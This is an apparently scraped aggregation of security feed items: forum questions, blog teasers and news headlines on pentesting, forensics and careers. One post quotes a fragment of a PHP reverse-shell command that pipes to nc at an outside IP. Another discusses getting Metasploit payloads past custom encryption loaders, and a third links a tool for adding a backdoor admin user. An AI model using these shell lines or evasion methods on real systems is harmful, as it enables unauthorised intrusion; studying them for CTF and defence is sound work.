    Context: I am a penetration tester and I am trying to learn more deeply about SMB. I use the tool crackmapexec to enumerate SMB, and I recently came across something weird when trying the following commands: - crackmapexec smb IP This sets the Domain name, User name, and Host name to NULL - crackmapexec smb IP -u '' -p '' This sets the Domain name, but sets the User name, and Host name to NULL - crackmapexec smb IP -u 'anything' -p '' This sets the Domain name, User name, and Host name This made me wonder, why does SAMBA treat any username as an anonymous login? Question: I've been looking through the SAMBA documentation (which is horrible someone please change this), to find what allows/disallows NULL and anonymous authentication. However, I have been unable to find what settings allow these. submitted by /u/jakeyee [link] [comments]
    book suggestions for highly technical subjects
    Hi Reddit, I'm looking for books similar to The ShellCoder Handbook but with updated contents. I'm focused on the exploit dev part. But anything else is also fine as long as it's highly technical. submitted by /u/ak_z [link] [comments]
    Spyware paranoia and tools to use to scan
    I have been suspecting a long-term 'friend' of mine has been spying on me for a while now due to suspicious things they say and suspicious activity in general. Their motivation I suspect due to their personality and history (if they are indeed spying on me) is just to fuck with me or to gather information on me for later usage. I would like to know of any tools I can use to discover any keyloggers, screen capturers, or other types of spyware that can access my social media accounts, browser, or just my device in general. I have scanned my device with a malware scanner and windows defender already, but nothing major has been discovered. I'm wondering if I should do a rootkit scan as well? Thanks Edit: Obviously, I'm aware this is an unlikely scenario, but there have just been a lot of big 'coincidences' that have been bugging me and I'm trying to do some research. If you ignore the background story, I guess I'm just trying to find out current/relevant possible attack vectors/specific tools for low-level personal spying (hardware, software, and network-based). And then, the appropriate tools and methods a defender would use. I apologise that this seems to be the wrong subreddit but I would appreciate any redirects to relevant subreddits/external resources. submitted by /u/Large-Run9434 [link] [comments]

    Project to Regularly and Automatically Update Docker Images that contains a lot of NetSec related tools
    submitted by /u/deleee [link] [comments]

    The Overlooked Security of NTP
    Time is something we rely on most every day, yet pay the least attention to; but attacks against the NTP time protocol can cause enormous harm and deserve our attention.

    Zest and ZAP! Let's Build a Powerful Security Testing Routine ⚡️
    What is Zest Zest is a JSON-based scripting language created by the Mozilla security team. It was built to make web testing easier, and I use it often in ZAP when testing. Zest in ZAP Honestly, the JSON format itself is not a format that is pleasant to rewrite (which is why configs mostly use yaml or toml), so writing it by hand is rather inconvenient. However, when Zest is used inside ZAP the logic can be controlled through the GUI interface, so that inconvenience goes away. Zest Structure Zest lets you specify the script type, parameters and so on in JSON format.
    [Cullinan #25] Plans Going Forward
    This is Cullinan log #25. Actually, this time, rather than an update log, I'm writing to share a bit more about future plans. What is Cullinan? First, Cullinan is a toy project I started last March to gather scattered blog posts into a single wiki and maintain them continuously. Its beginning is here. Collecting existing posts into single entries and adding entries I had not covered before, there are already 41 pages. I will keep adding many more entries (there is a pile being written in Notion 😅), and now I am thinking a bit more about how to present them too.

    Timing-Based Username Enumeration: What’s a fix versus mitigation?
    For web-based applications, Timing-based Username Enumeration is a great find. For testers it’s low-hanging fruit and a great way to… Continue reading on Medium »
    December UI/UX Contest Winner
    and our $425 prize winner is…🏆 Continue reading on SW DAO »  ( 1 min )
    A Cool Account Takeover Vulnerability due to lack of Client Side Validation
    Hello Everyone, My Name is Arth Bajpai , I’m from Lucknow India and this is my First writeup related to bug bounty Continue reading on Medium »  ( 2 min )
    Tinyman Bug Bounty Campaign
    Tinyman announces bug bounty campaign. Continue reading on Medium »  ( 1 min )
    Being Anonymous on the Internet(proxychains)
    Proxy chains Continue reading on Medium »  ( 1 min )
    Bypassing Door Passwords
    Instead of a key, this type of lock system requires a numerical code to grant entry to a facility or property. The code is punched in by… Continue reading on Medium »  ( 1 min )
    GYSR Bug Bounty Program
    Our highest priority has always been safety and security. Introducing the GYSR bug bounty program in partnership with Immunefi. Continue reading on GYSR »  ( 1 min )
    XXE — TryHackme WriteUp
    XML External Entity Writeup Continue reading on InfoSec Write-ups »  ( 2 min )
    How i got financial advisor by simply hack into their membership plan !
    Hello Infosec geeks Continue reading on Medium »  ( 1 min )
    A TALE OF 5250$ : HOW I ACCESSED MILLIONS OF USER’S DATA INCLUDING THEIR NATIONAL ID’S
    Hi, Hope you guys are doing well, And a Happy New Year, YAY! ✨, Let’s start the blog without wasting more time. Continue reading on InfoSec Write-ups »  ( 2 min )

    Received a Performance Evaluation yesterday
    First time poster here. Previous post for context: https://www.reddit.com/r/SecurityCareerAdvice/comments/rc6awd/i_passed_iso_27001_at_the_company_i_work_for/ As the title says, I got a performance evaluation today with a raise! One thing they asked me to look into is to find credentials (IT Standards like 27K1) to improve the organization. We just passed ISO 27001, so I'm guessing they are looking to expand themselves with additional credentials (IT Standards like 27K1). Any ideas? FYI, the company is a software-as-a-service business. submitted by /u/LordCommanderTaurusG [link] [comments]  ( 1 min )
    Internal Log4J attempts?
    hey guys, I understand somewhat how the exploit works but when you see in the logs a log4j exploit attempt that is internal to internal attempting a request for an outside LDAP server. How could that happen exactly? As in how was that request made in the first place? Does it mean the internal machine was exploited or is it just a request attempt through another means? If the machine is not vulnerable to make outgoing requests, is it just a case of blocking the server IP? Or is the mere fact that an attempt was made indicate vulnerability? Hopefully that made sense! Thanks submitted by /u/_illusions25 [link] [comments]  ( 1 min )
    How best to send sensitive personal identity documents to new employer?
    Starting a new job remotely and they've hit me via email with the I-9 Form, W4, and Direct Deposit Paychex form. So the forms have my SSN, bank details and personal info + my passport as an additional identity document. How do I send this stuff responsibly? I was thinking I could password protect each PDF inside a zip file and then call them to give them the password. What software do I need to encrypt these PDFs? Any recommendations or advice on a best practice here? submitted by /u/ChampionSSJ [link] [comments]  ( 2 min )
    CISSP Advice
    Just like the title says, what advice would you give someone that will begin studying for this cert? Like, is there a specific book, study guide/resources you’d recommend? I know there is a ton of material out there but some is hard to follow. Recent test takers' advice is appreciated. Thanks! submitted by /u/zzizourm [link] [comments]  ( 3 min )
    CEH and CEH Master worth it
    Are the CEH and CEH Practical worth taking if I am in my junior year in computer science? Will it at least help land me an interview in a company? Is it accredited in Canada? [Edit] Thank you so much for your comments, I will be shifting to eJPT and maybe CISSP after. submitted by /u/deadmeme-1 [link] [comments]  ( 4 min )

    NPM might be executing malicious code in your CI without your knowledge
    submitted by /u/words_are_sacred [link] [comments]  ( 1 min )
    Mutual Authentication: A Component of Zero Trust
    submitted by /u/alexfornuto [link] [comments]
    Lopsided routing, a stealthy hole punch into FortiGate
    submitted by /u/oherrala [link] [comments]  ( 1 min )
    PHP 7.3-8.1 disable_functions bypass using string concatenation (PoC)
    submitted by /u/dradzenglor [link] [comments]

    Bypass Cloudflare
    My leak bot https://twitter.com/leak_scavenger for a long time crawled the website ghostbin.co. Some of you asked how my bot is able to do… Continue reading on Medium »  ( 2 min )
    OSINT — Obtaining the E-mail of a LinkedIn Profile
    Due to the LinkedIn data leaks, some information such as the user's profile ID and e-mail was made available on… Continue reading on 100security »  ( 1 min )

    thefLink/Hunt-Sleeping-Beacons: Aims to identify sleeping beacons
    submitted by /u/dmchell [link] [comments]
    NOBELIUM’s EnvyScout infection chain goes in the registry, targeting embassies
    submitted by /u/dmchell [link] [comments]
    Bypassing Door Passwords w/wo default passwords
    submitted by /u/SocketPuppets [link] [comments]
    EDR Parallel-asis through Analysis - @MDSecLabs
    submitted by /u/dmchell [link] [comments]

    Email threads about potatoes (recipes, etc)
    submitted by /u/ryankrage77 [link] [comments]
    Google drives were always a debatable content on this sub. Now it seems that the "don't be evil" firm will answer this question for you.
    https://www.techradar.com/news/google-drive-could-soon-start-locking-your-personal-files EDIT: For clarification, your personal data (I guess even copyrighted material) not publicly available (open) are not concerned. But the findings shared here may become more and more rare. submitted by /u/krazybug [link] [comments]  ( 2 min )
    Wide selection of fairly recent magazines, mostly English language, but also German, Dutch and others
    submitted by /u/Dutchlawyer [link] [comments]
    Christmas Movies
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Another music one
    submitted by /u/International_Milk_1 [link] [comments]
    VARIOUS (300 TBS OF STUFF. Tom and Jerry cartoons, K-pop music, courses on bitcoin and video editing, Excel for beginners, and so on.)
    submitted by /u/International_Milk_1 [link] [comments]
    more music (Some empty folders)
    submitted by /u/International_Milk_1 [link] [comments]
    K-POP. METAL, ROCK
    submitted by /u/International_Milk_1 [link] [comments]
    MUSIC
    submitted by /u/International_Milk_1 [link] [comments]

    SecWiki News 2022-01-07 Review
    "2021 Space Security Report" by ourren; For more of the latest articles, visit SecWiki  ( 2 min )

    Antivirus Software Market Expected to Reach US$4.54 Billion by 2025
    By 2025, the antivirus software market is expected to reach US$4.54 billion.  ( 1 min )
    FreeBuf Morning Report | Shanghai's First Digital Yuan Employment Subsidy Lands; VMware Fixes Heap Overflow Vulnerability in Its Products
    It can validate and cross-check the relevant data, providing information support for combating crime.  ( 1 min )
    Bandit Walkthrough Log [Learning Basic Linux Commands]
    Bandit is a website for learning Linux that uses game-style levels to help us learn basic Linux commands; it is very suitable for those with no or weak foundations. This post clears every level and records and collects the related knowledge.  ( 1 min )
    Date Set! CIS 2021 Cybersecurity Innovation Conference Spring Edition Is Coming
    The conference is officially scheduled for March 2-3 at the Shanghai Baohua Marriott Hotel.  ( 1 min )
    Must-Read for Newcomers! The Difference Between DOM-based XSS and Reflected XSS
    This article can give newcomers a better understanding of XSS vulnerabilities, and also consolidates my own understanding of XSS; corrections from the masters are welcome wherever something is incorrect.  ( 1 min )
    FreeBuf Enterprise Group Discussion | Talking About Cybersecurity Vendor Consolidation (This Issue Includes a Bonus Topic)
    Gartner predicts that cybersecurity vendor consolidation will be one of the industry trends of 2022, with most organizations viewing vendor consolidation as a way to improve security.  ( 1 min )
    At the Start of the New Year, 斗象科技 Receives Its First Recognition of 2022
    In the new year, 斗象科技 will diligently refine its internal strengths and complete every task even better with more outstanding products and services.
    FreeBuf Weekly | NoReboot Malware Makes iPhones Fake a Shutdown; Hackers Steal Credit Card Data While You Watch Videos
    We have summarized and recommended this week's hot news, quality articles and handy tools, making sure you don't miss any of this week's highlights!  ( 1 min )
    NoReboot Malware Makes iPhones Fake a Shutdown
    The technique directly simulates what the user sees when an iPhone shuts down, disabling most physical feedback, so the iPhone looks as if it has really powered off.  ( 1 min )
    What "Methods" Do Hackers Use to Steal Cryptocurrency?
    Below is a roundup of the five largest cryptocurrency thefts of all time, which may reveal some patterns in how cryptocurrency gets stolen.  ( 1 min )
    FinalSite Hit by Ransomware Attack, Thousands of School Websites Unreachable
    In recent years, schools have become popular targets for ransomware attacks, especially K-12 schools with limited security budgets.  ( 1 min )
    华米科技 (Huami) Is Hiring Senior Security Engineers
    华米科技 (Huami), founded in 2013, is a leading global smart-wearable innovation company that hopes, through a "cloud (health cloud services) + device (wearable devices) + chip (chips)" layout, to use the power of technology to give everyone in the world better sports, health and medical services.
    Security Knowledge Graph | Cloud-side Data Analysis of the Log4j Incident
    Achieving precise and rapid localization of advanced threats  ( 1 min )
    Detailed Analysis of a UAC Bypass Technique Using the AppInfo RPC Service
    In our earlier attack-technique assessment we introduced a relatively new UAC bypass technique exploited in the wild; this article again analyzes its technical details in depth.  ( 1 min )

    Detecting Web Attacks Using A Convolutional Neural Network
    Introduction  ( 4 min )
    Authorization bypass — Gmail
    About the vulnerability  ( 3 min )
    Day 4, CN-Network Topologies #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
    [IDOR] add or remove the linked publications from Author Publisher settings — Facebook Bug Bounty
    Facebook Linked Publications ( Authorship or Author Tag ) feature was designed to give journalists more credit and visibility for the…  ( 2 min )

    7+ Major Reasons to Hire a Red Team to Harden Your App Sec
    The growing cyberthreat landscape has brought a storm in the online marketplace. From the online studies and research, there were around… Continue reading on Medium »  ( 4 min )

    Exploiting Redash instances with CVE-2021-41192
    Article URL: https://ian.sh/redash Comments URL: https://news.ycombinator.com/item?id=29834624 Points: 1 # Comments: 0  ( 5 min )

    Is it possible to extract WhatsApp data from this type of scenario?
    Phone: iPhone XS (A12 chip) [Wipe data after 10 attempts is ON] Passcode: Unknown iOS Ver: 14.7 Mode: AFU WhatsApp: 2FA Active I have access to UFED, Oxygen, XRY; I also have budget for more tools if there is any tool that is capable of doing it. Thank you in advance. submitted by /u/wtfisgoingong1 [link] [comments]  ( 1 min )

    Unprotected directory of [NSFW] videos and images from internet sex work
    submitted by /u/Shark_Octopus [link] [comments]
    Movies
    submitted by /u/International_Milk_1 [link] [comments]
    "Soul, Hip Hop, Rare Grooves, House and Jazz "
    submitted by /u/International_Milk_1 [link] [comments]
    EPISODES of StarTrek-NewVoyages.
    submitted by /u/International_Milk_1 [link] [comments]
    Capybaras
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    movie stills featuring reptiles and amphibians.
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]

    The JNDI Strikes Back – Unauthenticated RCE in H2 Database Console
    submitted by /u/SRMish3 [link] [comments]
    Garlicshare - Private and secure file sharing over the Tor network
    submitted by /u/ILDVUCE [link] [comments]  ( 1 min )
    Announcing the first open source security tool for Heroku!
    submitted by /u/cloud-defender [link] [comments]
    SANS Christmas Challenge 2021 - Write-up
    submitted by /u/the-useless-one [link] [comments]  ( 1 min )

    Imaging a live server
    I wanted to ask if there was a good way to create a forensic image of a server that can't be taken offline? Thanks submitted by /u/Pizza_Eating_Robots [link] [comments]  ( 1 min )
    Any free practice images out there
    Hi people, I work within digital forensics and I'm currently off work with covid; due to the nature of my job I cannot work from home and was wondering if there are any websites out there that provide disk images for fictional triage / investigation. Thanks in advance submitted by /u/LukeT1123 [link] [comments]  ( 1 min )

    Good security certs to obtain for better progression
    Hi, I have been working in the information security industry for around 2 years now and recently secured a permanent role in the UK. My roadmap for this year is to obtain security certs and this is what I am planning: CompTIA Security+, Microsoft Azure Fundamentals. What advice do you have to reach a £75K+ salary in the next two to three years? Thanks submitted by /u/gavxz [link] [comments]  ( 1 min )
    Technicalities in VPN effectivity: Can anyone online tell when you're using a VPN?
    If a VPN disguises your IP address when you use the internet, do internet providers and the websites you visit realise that you're using a VPN, or do they get the perfect impression that you're a normal internet user from wherever it is you go with your VPN? For reference, here are a few scenarios where your cover could be compromised: An internet user using an internet company only functional in Australia would be in, say, Pakistan through a VPN. You lose your connection to your VPN more than once on the same website (so you're switching back and forth between locations in seconds); trackers could not only realise that you're using a VPN but also know your actual location. (It may not be the case that this is how VPN works, but:) Among its many available locations, say for example you chose NY, USA; if a VPN provider simply transports all its users choosing NY, USA to one precise location in NY, wouldn’t it be clear that all that activity coming from one spot, down to the coordinate, isn’t really thousands of computers crammed in one area but people using the same VPN service? I have loads of thoughts on how if someone really really wanted to find your location, they could definitely do so, and how even small windows of error are subject to great scrutiny online. However, it's all dependent on how much of my speculation is actually true. Cheers! This question has been posted on other relevant subreddits as well. submitted by /u/lazariomo [link] [comments]  ( 3 min )
    Digital certificates: why do the certificates not get stolen?
    I am probably missing something here, but I don't get how digital certificates prove the identity of whoever has them. Granted, if someone decrypts a certificate with the public key of a certificate authority and retrieves the public key of a certain party, they can know for sure that this authority once signed the certificate request for said party, but can't any given person retrieve that certificate from that party, and then start providing it as if it was their own? submitted by /u/Pegasus9208 [link] [comments]  ( 3 min )
    HackTheBox Nibbles: Full TTY Shell how?
    So I'm reading a walkthrough of Nibbles from 0xdf and they used a PHP code like: &1|nc 10.10.15.154 8082 >/tmp/f"); ?> I was stuck for hours trying to get a full TTY shell, and none of the guides on breaking out of a limited shell have worked. Clearly, 0xdf knew what he was doing. I want to learn more about what this command is doing: Where does one learn how to do this? Is there more of where this comes from? (I'd like to learn more so I can note it down) What is the logic behind this? Why is this superior to the reverse shell PHP I crafted using MSFVENOM? I'd like to be provided a fishing rod and a lake, rather than the fish. I'd like to learn how to do these things before I read up on how somebody else did it. I'm also okay with paid resources on the subject (books, courses, subscription), as I believe content creators should be paid for their skill and time. submitted by /u/DiickBenderSociety [link] [comments]  ( 1 min )
    Who is hosting the most malware?
    I would like to know from your experience where have you seen the most malware, most often, if you would have to choose between IBM networks, DigitalOcean, Microsoft, ATT, Google, Akamai, Github and Amazon networks? submitted by /u/ciovlici [link] [comments]  ( 2 min )
    How do I start building the security team?
    Hello everyone, I'm currently working at a small startup company as one of the 5 people acting as admin / engineer / architect / security people / printer fixer / security analyst. I realize that the team is quickly burning out with the variety of tasks and mountains of unending work in this state. I talked to my boss about this and he agrees that something needs to be done. We are planning to hire a third party vendor to do some of the stuff. However, my boss is quite adamant that the security roles must be done in house and asked me to create a plan on how many divisions we need to create, how many people to hire etc. Is there any guide out there that can help me with this in CIS style with focus on scalability? So for example in a small organization you need at least these teams, later on you can add these teams etc. Or can you guys share how your organization tackled this challenge? Any input is greatly appreciated. Thanks for sharing submitted by /u/XynderK [link] [comments]  ( 4 min )
  • Open

    Grafana LFI on https://grafana.mariadb.org
    MariaDB disclosed a bug submitted by realtess: https://hackerone.com/reports/1419213
  • Open

    Another simple .NET executable to create and add a backdoor user
    Another simple but useful .NET executable that creates and adds an arbitrary user or domain user to the Local Administrators group. Very useful for privilege escalations on Windows (i.e. unquoted service path) Repo: https://github.com/notdodo/LocalAdminSharp submitted by /u/d_o_d_o_ [link] [comments]  ( 1 min )
    Cobalt Strike Sleep Mask IOC
    https://codex-7.gitbook.io/codexs-terminal-window/blue-team/detecting-cobalt-strike/sleep-mask-kit-iocs Recently noticed an IOC of the sleep mask kit while testing my own payloads, being the hook on the sleep() winapi. submitted by /u/CodeXTF2 [link] [comments]
    What Is Red Teaming, How Does It Work and Why Is It Important?
    submitted by /u/stanley9528 [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-06 Review
    Firmware analysis for vulnerability hunting in a certain system by ourren; DataCon2021 domain name system security track, black market direction: in-depth analysis of the challenge by ourren; A brief discussion on building data security operations capability by ourren; 2021 “CCF Outstanding Doctoral Dissertation Award” list and full texts by ourren; For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Using BBRF with a focus on Reconnaissance #bugbounty
    Hello, how are you? Continue reading on Medium »  ( 4 min )
    My First Bug Bounty Report | POST-based XSS
    Hello Ninjas!!!! I am Vishal Barot aka vFlexo and today I decided to publish a write-up on how I got my first bounty through my first ever… Continue reading on Medium »  ( 2 min )
    Authorization bypass — Gmail
    About the vulnerability Continue reading on InfoSec Write-ups »  ( 2 min )
  • Open

    Advanced Searching with Google Dorking
    What is Google Dorking? Continue reading on Medium »  ( 2 min )
    Writeup_TryHackMe_Searchlight — IMINT
    As part of OSINT learning, I am working to complete all the Try_Hack_Me rooms which are linked to OSINT research. Continue reading on Medium »
  • Open

    Kerberos Authentication (again… but better)
    One of the best-known authentication protocols in Windows environments is Kerberos (RFC 1510 for V5). Continue reading on Medium »
    What is a red team
    In a red team/blue team cybersecurity simulation, the red team acts as an adversary, attempting to identify and exploit potential… Continue reading on Medium »  ( 3 min )
    CompTIA ITF+
    I was fortunate that the CompTIA ANZ Business Technology Community & Horden Technologies offered a free, entry-level qualification for… Continue reading on Medium »  ( 1 min )
  • Open

    An ‘Attack Path’ Mapping Approach to CVEs 2021-42287 and 2021-42278
    1.0 Introduction On Friday, December 10, 2021, Charlie Clark (@exploitph) published a blog post detailing the weaponization of CVEs 2021-42287 and 2021-42278. In the blog post, Charlie extensively covered the background of the vulnerabilities, how the vulnerabilities were weaponized into Rubeus, with help from Ceri Coburn (@_EthicalChaos_), the full ‘attack chain,’ mitigations, and some detections.... The post An ‘Attack Path’ Mapping Approach to CVEs 2021-42287 and 2021-42278 appeared first on TrustedSec.  ( 7 min )
  • Open

    New APT trend: growing use of strategically dormant domains, which are hard to detect
    Attackers increasingly register domains in advance and keep them in reserve; attacks using such strategically dormant domains are on the rise.  ( 1 min )
    Hongri (Red Sun) Security Range 3
    The goal is to obtain a file from the Win2012 domain controller.  ( 1 min )
    Custom built: creating a mobile system dedicated to white hats
    To do a better job of analyzing malicious samples, this article shares a new idea: a custom built mobile system dedicated to white hats!  ( 1 min )
    The ten most common ATT&CK tactics and techniques
    Picus researchers collected more than 200,000 real-world threat samples from various sources, identified each sample's tactics, techniques and procedures (TTPs) and classified every TTP; across all samples, more than 1.8 million ATT&CK technique instances were identified.  ( 1 min )
    FreeBuf Morning Report | Scammers impersonating brokers defraud investors of $50 million; shopping and online-lending scams are the most common
    “E-commerce order brushing lets you make money at home with a flick of your finger”, “Follow the teacher and make big money in stocks”... Online, users frequently receive messages like these through push notifications from all kinds of apps; behind these tempting “free lunches” lie dangerous “traps”.  ( 1 min )
    What is the SSVC mentioned in CISA's Cybersecurity Incident and Vulnerability Response Playbooks?
    As a new vulnerability assessment method, SSVC is characterized by three orientations: supply-chain oriented, decision-outcome oriented, and practical-experience oriented.  ( 1 min )
    Cipher suites: ciphers, algorithms and negotiating security settings (Part 1)
    But cipher suites really do play a crucial role in every HTTPS connection we establish over the Internet.  ( 1 min )
    Google moves in, acquiring Israeli cybersecurity company Siemplify for $500 million
    Reuters reports that Google's cloud computing division has completed its acquisition of Israeli cybersecurity company Siemplify.  ( 1 min )
    Exploring new energy, a new future for security | The official website of the first “New Forces in Cybersecurity” conference is now live
    The official website of the first “New Forces in Cybersecurity” conference went live today; sign up now!  ( 1 min )
    Honda and Acura cars hit by a Y2K-style bug, clocks reset to 2002
    Will Honda and Acura really make owners wait seven months for this bug to be fixed?
    Researchers expose a long-hidden financial theft group: Elephant Beetle
    The group targets transaction processing systems and has been stealing funds from financial entities in Latin America for at least four years.  ( 1 min )
    Farewell to Script Kiddies series | Java Security (2): Java decompilation tips
    The Farewell to Script Kiddies series is a new feature of this WeChat account that combines code auditing, security research and vulnerability reproduction, intended to help readers understand vulnerability principles more deeply and master the approaches and techniques of vulnerability discovery. We will explain Java security related techniques progressively, from basic to advanced.  ( 1 min )
    Statistics: the impact and cost of cybersecurity incidents
    Software security is the foundational line of defense for cybersecurity, which reminds us that code security should be taken seriously from the very start of software development in order to improve software security.  ( 1 min )
    Git information leakage: principles and a summary of exploitation
    With improper configuration, the “.git” directory may be deployed directly to the production environment, which causes the Git leakage problem.  ( 1 min )
  • Open

    Vulnhub: MoneyBox 1 Walkthrough
    I dropped here again to give you another writeup (written 5 months ago!) of the box from vulnhub MoneyBox 1. You can read my blog on…  ( 4 min )
    Vulnhub: Crossroads 1 Walkthrough
    Wuahahahhahaha! Sneaking in again to leave another writeup for ya of the box from vulnhub Crossroads 1. Have a look at my last blog which I…  ( 5 min )
    Module-1 | Introduction -Pentesting & Bypassing Cloud Web Application Firewall of Major Clouds
    Why you should not trust the cloud WAF?  ( 4 min )
    Vulnhub: VulnOS 2 Walkthrough
    Hey everyone, here’s a write-up of the box from vulnhub VulnOS 2. I wrote this writeup 5 months ago and am curious to share my notes (how I…  ( 7 min )
    Vulnhub: Pwned 1 Walkthrough
    Back again with the next write-up of the box from vulnhub Pwned 1. You can read the blog I just published a few moments ago, Vulnhub: VulnOS…  ( 6 min )
    Facebook android webview vulnerability : Execute arbitrary javascript (xss) and load arbitrary…
    For detailed information read the blog below:  ( 1 min )
  • Open

    'DoorLock' Vulnerability Can Force iOS Devices to Endlessly Reboot
    Article URL: https://www.pcmag.com/news/doorlock-vulnerability-can-force-ios-devices-to-endlessly-reboot Comments URL: https://news.ycombinator.com/item?id=29819095 Points: 2 # Comments: 0  ( 5 min )

  • Open

    Useful Extensions for Vscode
    What code editor do you use? I have been a vim user since my undergraduate days, then went through vim + geany and atom + vim, and have now switched to using vscode and vim at the same time. (I say vim, but I actually use neovim 😅) I was curious so I posted a poll, and the percentages differed much more than I expected (I was thinking about 7/3..). Anyway, as I moved over to vscode I started looking into vscode extensions, and I would like to share the ones I found decent after installing several. Atom -> Vscode I was actually a user who was satisfied with Atom and used it happily.
  • Open

    Anyone use X1 to capture Facebook and are you having issues with it right now?
    Just wondering if it's just me. It's only capturing images on the first page, the rest are blank. I've tried 4 times today submitted by /u/ShadowsWandering [link] [comments]  ( 1 min )
    Automated approach to Memory Analysis
    Hello all, So we’re on a Project and being the sole one to do the task, I was wondering if there’s some extent to which we can automate the Memory Analysis part! Currently, I do it using Volatility Framework! I came across Volatility Bot, but saw it was last pushed 5 years back, so step aside! Any leads could really help me! Thanks submitted by /u/GloryHunter9 [link] [comments]  ( 1 min )
    Investigating an employee
    Hello, Not sure if this is the correct location. If I'm to investigate an employee for not working during work hours, or someone with suspicious login activities, what common places will you be investigating? E.g. checking browser histories. Physical security (login/logout time) Docs created on DMS (files opened, accessed, etc.) Recently printed docs? In other words, to know what a person is doing at work, what activities (or logs) should I be searching? submitted by /u/ram3nboy [link] [comments]  ( 1 min )
  • Open

    Staging Cobalt Strike with mTLS using Caddy — Improsec | improving security
    submitted by /u/dmchell [link] [comments]
    Can You Trust a File’s Digital Signature? New Zloader Campaign exploits Microsoft’s Signature Verification putting users at risk - Check Point Research
    submitted by /u/dmchell [link] [comments]  ( 1 min )
    Which protocols allow authentication with AD passwords?
    SMB - 445. WINRM - 5985/6. RDP - 3389. WMI - 135/9. RPC - 5001. Ldap - 389 What more? submitted by /u/henadar [link] [comments]
    Metasploit payloads dont work with custom loaders
    Hello, I'm taking a course by Sektor7. I have the problem that, no matter which way I try, I can't get a metasploit payload executed correctly by any loader (cpp) in the course. The program runs, but no meterpreter session is opened anymore. What I tried: Simple xor encryption and decryption Simple AES encryption and decryption Even base64 encoding doesn't work for me I also tried to research the root of the problem with no success. The source I used was already fixed for all problems any debugger gave me: The python script for aes encryption: https://pastebin.com/Qyxa3Zrr The cpp loader that decrypts and runs the payload in memory: https://pastebin.com/MfVynd45 the compiler (a custom batch): https://pastebin.com/rn6zXfqi I already tried to generate a PE with msfvenom and run it through the python, did not work. I tried to generate the raw payload with msfvenom, then encrypt it manually and put the aes key and payload into the cpp, didn't work. I tried to generate with -f raw -o 1.bin, then run the .bin through the python, didn't work. Note: Only the shellcodes provided by Sektor7 seem to work flawlessly. These have no other function besides executing the calc.exe from the System32 folder or showing basic messages. Maybe the sheer size of metasploit generated payloads or its custom functions makes them break during the encryption and compilation process? If yes, why, and how do I design the loaders so they don't break the payload? submitted by /u/janameyers2002 [link] [comments]  ( 2 min )
  • Open

    Is it too late to change path?
    Hi, I have been a sysadmin for 8 years and now I am thinking of changing my career path to network & security, because I see my colleagues in the security field and have started to like it more and more. So my question is where to start? submitted by /u/lisi_dx [link] [comments]  ( 1 min )
    Is there any valid reason to disallow special characters from a password?
    Was helping my partner’s parents set up a password manager and they found that their bank does not allow special characters in their password. None. To me this is a red flag that indicates they aren’t sanitizing their database inputs and could be vulnerable to SQL injection. But is that overly paranoid? Is there a legitimate reason to disallow special characters? (For the record I recommended they use a long passphrase) submitted by /u/furikakebabe [link] [comments]  ( 4 min )
    A random user on omegle said my name
    Honestly a lil freaked out rn cause a random user on omegle guessed my name within 10 seconds of getting matched there. He was like “i know everything about you” and I thought he was just trolling. But then dude proceeded to say my name. He got my age wrong. I got freaked out and immediately disconnected. I don’t know much about these things. Should I be worried? Am I hacked? submitted by /u/Indecisive-blahblah [link] [comments]  ( 3 min )
    Can anyone track a deleted gmail account?
    The police are already involved in this matter, and they’ve told me it’s okay to seek outside help from any individual or a cyber forensic PI company. At my job there’s an anonymous individual that’s been sending harmful misinformation about several of my colleagues. They made a Gmail account, sent emails out to many people, and deleted the account. These emails have ruined many lives. Unfortunately the police can’t do anything, but they said once we get a positive ID we can proceed with charging them with stalking, harassment, and defamation. Just to reiterate, law enforcement is involved, and they’ve given me permission to go this route in apprehending the suspect. Could anyone assist in helping me track down the user so that I may forward the information to the police? I’ll pay. submitted by /u/deathbygoat [link] [comments]  ( 6 min )
    Could malware listen for cryptocurrency mnemonics through our devices - and what is the likelihood?
    Cryptocurrencies are often secured by a "mnemonic" which is a list of words selected from a set of 2048 standard words. If this mnemonic is compromised, all the funds can be stolen. Hypothetically, malware could listen for these 2048 keywords through the microphones on our laptops and mobile phones. Upon detecting these keywords, it could send a recording to the hacker. I'm asking this because personally I was writing down my mnemonic and then realised I had spoken the words as I was writing. My phone and laptop were in my room with me. There is no way to change my mnemonic currently, so I am hoping it has not been compromised. Do you think this kind of hack is plausible, or likely, or is it a slim possibility? Please be honest. Thank you for your time. submitted by /u/netsec-microphone-Q [link] [comments]  ( 2 min )
    Which FW brand / model do you respect or even impress you?
    Hi, The background is that I recently found out that my old Mikrotik RB750GL at home went out of support over a year ago. Since I just botched the PAN PA-200 I got for free from a friend it hit me: I have no idea what brands to avoid and what brands have a sound strategy and nice customer support for non enterprise customers. While I appreciate model recommendations my curiosity is more about a discussion about brands / models that are positioned for the non commercial environment and the power user market... the why and why nots. Is there some functionality that you are surprised still isn't implemented in FWs far below the enterprise market? Is there a brand that you will do almost anything to avoid? Is there a model that should be crowned as the Bernie Madoff of firewalls? I am thinking about a SOHO appliance box that Is below / around $200 Is not "compile OpenBSD on it and use VI to...." as close to set and forget as you dare Handles at least 100Mbps internet connectivity (and gigabit routing on the internal net if there's multiple ports) Netflix, Gmail etc etc needs to work without configuring every client Deal with 2-4 users that think "port" has something to do with ships VLAN capability Simple to use VPN like Wireguard Smart addon services that might be on a yearly / monthly basis that really is worth it? submitted by /u/mindlight [link] [comments]  ( 4 min )
    What is a good CVE/Vuln MANAGEMENT Tool?
    I have put MANAGEMENT in caps for a reason. We already have some scanners (a couple of big names) but nothing to really help MANAGE the vulns. Ideally things I'd like to be able to do: Have workflows based on CVSS eg scores of 7 and greater must be reviewed by X CVE comments Adjusted CVSS for local env mark/detect affected products/components jira integration Ingestion from qualys/other scanners etc Integration with threat intel Sort of like a CVE/vuln/risk specific ticketing system? At the moment we have things in a few different systems/spreadsheets and it's making things a little tough to manage, I'd really like to be able to pull everything together to be able to manage things properly. Should ideally be scanner agnostic. submitted by /u/paracausalhorse [link] [comments]  ( 4 min )
  • Open

    PPTShots - Unintentionally shared data in PowerPoint presentations
    submitted by /u/df_works [link] [comments]  ( 1 min )
    We desperately need a way to rapidly notify people of high-impact vulnerabilities, so I built one
